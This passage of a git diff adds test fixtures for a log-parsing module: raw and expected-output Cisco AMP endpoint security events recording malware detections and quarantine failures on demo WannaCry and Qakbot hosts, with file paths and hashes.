Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064606","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":907000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064605","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":907000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064607","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":891000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064604","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":876000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064603","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":845000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064602","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":798000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064601","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":767000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064598","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":751000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064600","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":735000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":423000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064597","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"process_id":6404,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":377000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064596","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} \ No newline at end of file diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp4.ndjson.log-expected.json b/x-pack/filebeat/module/cisco/amp/test/cisco_amp4.ndjson.log-expected.json new file mode 100644 index 00000000000..3fb89dbd615 --- /dev/null +++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp4.ndjson.log-expected.json @@ -0,0 +1,5890 @@ +[ + { + "@timestamp": "2021-01-14T21:17:16.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "38:1e:eb:ba:2c:15" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.6A37D750F0-100.SBX.TG", + "cisco.amp.detection_id": "6508397899087347713", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "38:1e:eb:ba:2c:15" + ], + "cisco.amp.timestamp_nanoseconds": 295927133, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6508397899087348000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.md5": "41476df3138717868118d8542cf3d1d6", + "file.hash.sha1": "5ca4bef8de6def53519d4b22632675bb4c1e470b", + "file.hash.sha256": "6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86", + "file.name": "resume.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\Desktop\\resume.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP", + "host.name": "Demo_AMP", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 0, + "related.hash": [ + "6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86", + "41476df3138717868118d8542cf3d1d6", + "5ca4bef8de6def53519d4b22632675bb4c1e470b" + ], + "related.hosts": [ + "Demo_AMP" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T20:38:26.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.E4FCCBFA69-95.SBX.TG", + "cisco.amp.event_type_id": 1107296272, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 844899579, + "event.action": "Executed malware", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 14930696955218, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "event.start": "2021-01-14T20:38:26.000Z", + "file.hash.sha256": "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "input.type": "log", + "log.offset": 1313, + "process.hash.sha256": "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014", + "related.hash": [ + "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T20:18:05.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6412680266518626319", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 587000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412680266518626000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "input.type": "log", + "log.offset": 2612, + "related.hash": [ + "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T20:18:05.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6412680266518626317", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 494000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412680266518626000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "input.type": "log", + "log.offset": 3794, + "related.hash": [ + "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T20:18:05.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.E4FCCBFA69-95.SBX.TG", + "cisco.amp.detection_id": "6412680266518626319", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 587000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412680266518626000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014", + "file.name": "28242311.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\28242311.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 4969, + "process.hash.md5": "b5ede95ec8bc4ad6984758be42b152bd", + "process.hash.sha1": "f504774b72acfb23a46217aec9c6559fd7e4df64", + "process.hash.sha256": "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014", + "process.name": "QuotaGroup.exe", + "process.pid": 7120, + "related.hash": [ + "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T20:18:05.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.E4FCCBFA69-95.SBX.TG", + "cisco.amp.detection_id": "6412680266518626318", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 572000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412680266518626000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b5ede95ec8bc4ad6984758be42b152bd", + "file.hash.sha1": "f504774b72acfb23a46217aec9c6559fd7e4df64", + "file.hash.sha256": "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014", + "file.name": "QuotaGroup.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 6511, + "related.hash": [ + "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014", + "b5ede95ec8bc4ad6984758be42b152bd", + "f504774b72acfb23a46217aec9c6559fd7e4df64" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T20:18:05.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.E4FCCBFA69-95.SBX.TG", + "cisco.amp.detection_id": "6412680266518626317", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 494000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412680266518626000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014", + "file.name": "28242311.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\28242311.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 7890, + "process.hash.sha256": "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014", + "process.name": "28242311.exe", + "process.pid": 4788, + "related.hash": [ + "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T20:18:05.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.E4FCCBFA69-95.SBX.TG", + "cisco.amp.detection_id": "6412680266518626316", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 478000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412680266518626000, + "event.kind": "alert", + 